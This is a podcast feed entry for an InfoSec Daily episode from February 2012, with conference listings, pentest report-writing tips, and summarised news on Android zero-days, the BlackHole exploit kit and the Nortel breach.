<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pentest Lessons</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1. When writing the report take the time to think about your target audience (who is paying your bill) Some pro-tips for reporting:</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Don&rsquo;t ever start a report with &ldquo;</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As had been expected, an extensive set of gaps exist&rdquo;. </span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Don&rsquo;t ever &nbsp;include items in the report that you have not tested against and/or collected evidence of</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Don&rsquo;t ever provide a report that hasn&rsquo;t been formatted properly, including a draft</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Don&rsquo;t ever merge findings with recommendations in the same statement</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Don&rsquo;t ever make comments such as &ldquo;Clearly this server isn&rsquo;t being maintained&rdquo;</span></li>
</ul>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Don&rsquo;t ever submit a draft without checking grammar and spelling</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Don&rsquo;t ever forget version control</span></li>
</ul>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2. In keeping with getting to know you&rsquo;re audience, you might want to research at least the points of contact at your client. Although it doesn&rsquo;t happen often, on occasion you might run into a client who has significantly more experience than you do. Don&rsquo;t make statements expecting them to be taken at face value, especially if you are wrong. </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If for some reason the PoC challenges a statement with a cash wager, asking you to prove it. Either accept the challenge, or move on. Don&rsquo;t challenge them in return as this effectively lowers their perception of your expertise. </span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="https://threatpost.com/en_us/blogs/researchers-dump-trove-0days-popular-android-applications-020812"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://threatpost.com/en_us/blogs/researchers-dump-trove-0days-popular-android-applications-020812</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Researchers in China published a trove of information on previously unknown (zero day) vulnerabilities in popular applications for Google&#39;s Android mobile operating system on Wednesday, including mobile browsers and at least one mobile wallet application.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The vulnerabilities were found in a wide range of Android applications and components, including Webkit, which is used to render Web pages on Android and iOS devices, mobile versions of the Firefox and Opera Web browsers, applications for posting to Twitter and more. The vulnerabilities vary in severity, but many would allow a malicious hacker to access personal data on the device including sms messages and personal contacts, and manipulate or take control of social networking- and other third party services accessed from the vulnerable application.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Research on 6 zero day vulnerabilities was published on Wednesday by a group calling itself 80vul Quality Assurance Group. Little is known about 80vul, which describes itself as &quot;a group of dedicated young people&quot; on their Web page. Those vulnerabilities include cross site scripting, cross domain and cross protocol vulnerabilities in Webkit &#8211; a common component in Android, iOS and Mac OSX devices. The researchers also found a cross site scripting vulnerability on a version of the Google Reader application for HTC Mobile devices that could allow a malformed (&quot;evil&quot;) RSS feed to access data on the device.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://blog.webroot.com/2012/02/08/researchers-intercept-two-client-side-exploits-serving-malware-campaigns/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.webroot.com/2012/02/08/researchers-intercept-two-client-side-exploits-serving-malware-campaigns/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security researchers from Webroot have intercepted two currently live client-side exploits serving malware campaigns that have already managed to infect over 20,000 PCs across the globe, primarily in the United States. Based upon detailed analysis, it can be concluded that both campaigns are launched by the same cybercriminal.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">More details:</span><img height="342px;" src="https://lh4.googleusercontent.com/qxx9Kc5rYxd5l8-ZDwMdQxsgAKO4phfjmF7mCIFpXWtT2DaZrxHKCjyTrJNjvgKvn9C9tNRAcVt8XMpLvZffsHVLtC6VkfGcJ6sxgo-aq9it6xRUnSE" width="629px;" /><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Using the BlackHole web malware exploitation kit, the malicious attackers are currently serving explots to tens of thousands of unsuspecting end users.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As you can seen in the screenshot, they have already managed to infect 20,976 hosts. 17530 hosts were successfully exploited using the Jave Rhino exploit, 3163 hosts were exploited using the PDF LIBTIFF exploit, 375 hosts were exploited using the PDF ALL exploit, 70 hosts were exploited using the FLASH exploit, 29 hosts were exploited using the HCP exploit, 26 hosts were exploited using the MDAC exploit, and 23 hosts were exploited using the Jave OBE exploit.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><br />
	<a href="http://www.gfi.com/page/113933/cybercriminals-cast-a-wide-net-in-january-targeting-a-broad-range-of-victims"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.gfi.com/page/113933/cybercriminals-cast-a-wide-net-in-january-targeting-a-broad-range-of-victims</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">GFI Software today released its VIPRE&reg; Report for January 2012, a collection of the 10 most prevalent threat detections encountered during the month. Last month saw malware attacks targeting a wide range of potential victims, including gamers looking for a Pro Evolution Soccer 2012 game crack, small business owners concerned about the reputation of their business, and government organizations receiving spoofed messages from the United States Computer Emergency Readiness Team(US-CERT).</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Anyone who goes on the internet is a potential target for cybercriminals looking to infect systems and scam users,&rdquo; said Chris Boyd, senior threat researcher at GFI Software. &ldquo;Malware writers and phishers do not discriminate. They purposefully cast a wide net when picking their methods of attack in order to reach as many targets as possible. Whether you are a young gamer, a successful business owner or a government employee, you need to be wary when clicking on links that appear to pertain to your interests, especially when asked to submit personal information online.&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In addition to malware writers installing rootkits on the systems of gamers who were looking for a pirated release of Pro Evolution Soccer 2012, developed by Konami Digital Entertainment, Inc., scammers also latched onto the buzz surrounding the upcoming fourth installment of the Halo&reg; video game series, developed by 343 Industries, by offering bogus beta invites in return for filling out surveys and recommending links on Facebook and Google+. These attacks leverage the popularity of these titles among the gaming community and are meant to take advantage of the mistakes some users might make when acting out of excitement about a favorite game franchise.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.wired.com/epicenter/2012/02/perpetual-window-into-gmail/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.wired.com/epicenter/2012/02/perpetual-window-into-gmail/</span></a><br />
	<a href="http://www.wired.com/epicenter/2012/02/perpetual-window-into-gmail/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The other day, I tried out</span></a><a href="http://unroll.me/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Unroll.me</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, a clever new service that reads your inbox to let you unsubscribe from mailing lists and other unwanted e-mail flotsam with a single click.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As I was about to connect my Gmail account, my finger hovered over the &ldquo;Grant access&rdquo; button.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Wait a second.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Who am I giving access to my Gmail account, anyway? There was no identifying information on their site &mdash; no company address, no team page listing the names of its team members, and broken links to their privacy policy or terms of service.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For all I knew, it could be run by unscrupulous spammers or an Anonymous troll looking for lulz. And I was about to give them unfettered access to eight years of my e-mail history and, with password resets, the ability to access any of my online accounts?</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I had to dig around online to find out who&rsquo;s behind it, and fortunately, Unroll.me is a totally legit NYC-based startup providing a useful service. I spoke to Perri Blake Gorman, Unroll.me&rsquo;s cofounder and CMO, who assured me they&rsquo;ll add all the company information as they roll out their public beta.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://online.wsj.com/article_email/SB10001424052970203363504577187502201577054-lMyQjAxMTAyMDEwMzExNDMyWj.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://online.wsj.com/article_email/SB10001424052970203363504577187502201577054-lMyQjAxMTAyMDEwMzExNDMyWj.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For nearly a decade, hackers enjoyed widespread access to the corporate computer network of Nortel Networks Ltd., a once-giant telecommunications firm now fallen on hard times.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Using seven passwords stolen from top Nortel executives, including the chief executive, the hackers&mdash;who appeared to be working in China&mdash;penetrated Nortel&#39;s computers at least as far back as 2000 and over the years downloaded technical papers, research-and-development reports, business plans, employee emails and other documents, according to Brian Shields, a former 19-year Nortel veteran who led an internal investigation.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hackers also hid spying software so deeply within some employees&#39; computers that it took investigators years to realize the pervasiveness of the problem, according to Mr. Shields and Nortel documents reviewed by The Wall Street Journal. They &quot;had access to everything,&quot; Mr. Shields said of the hackers. &quot;They had plenty of time. All they had to do was figure out what they wanted.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to an internal report, Nortel &quot;did nothing from a security standpoint&quot; to keep out the hackers, other than resetting the seven passwords.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nortel&#39;s breach offers a rare level of detail about a type of international corporate espionage that is of growing concern to U.S. officials. A U.S. intelligence report released in November concluded that hackers operating from China&mdash;both government-affiliated and private-sector&mdash;are the world&#39;s most &quot;active and persistent&quot; perpetrators of industrial spying. The report cited a number of Chinese attacks, including one targeting Google; the theft of data from global energy companies; and theft of proprietary data such as client lists and acquisition plans at other companies.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-595-80vul-quality-assurance-group-blackhole-vipre-invisible-gmail-chinese-hackers/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3512/0/infosec-daily-podcast-episode-595.mp3" length="19271348" type="audio/mpeg" />
		<itunes:duration>0:40:06</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 595 for February 15, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka th[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 595 for February 15, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Pentest Lessons
	1. When writing the report take the time to think about your target audience (who is paying your bill) Some pro-tips for reporting:

Don&#8217;t ever start a report with &#8220;As had been expected, an extensive set of gaps exist&#8221;. 
Don&#8217;t ever &#160;include items in the report that you have not tested against and/or collected evidence of
Don&#8217;t ever provide a report that hasn&#8217;t been formatted properly, including a draft
Don&#8217;t ever merge findings with recommendations in the same statement
Don&#8217;t ever make comments such as &#8220;Clearly this server isn&#8217;t being maintained&#8221;


Don&#8217;t ever submit a draft without checking grammar and spelling
Don&#8217;t ever forget version control


	2. In keeping with getting to know you&#8217;re audience, you might want to research at least the points of contact at your client. Although it doesn&#8217;t happen often, on occasion you might run into a client who has significantly more experience than you do. Don&#8217;t make statements expecting them to be taken at face value, especially if you are wrong. If for some reason the PoC challenges a statement with a cash wager, asking you to prove it. Either accept the challenge, or move on. Don&#8217;t challenge them in return as this effectively lowers their perception of your expertise. 
	&#160;
Stories
Source: &#160;https://threatpost.com/en_us/blogs/researchers-dump-trove-0days-popular-android-applications-020812
	Researchers in China published a trove of information on previously unknown (zero day) vulnerabilities in popular applications for Google&#39;s Android mobile operating system on Wednesday, including mobile browsers and at least one mobile wallet application.
	The vulnerabilities were found in a wide range of Android applications and components, including Webkit, which is used to render Web pages on Andro[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
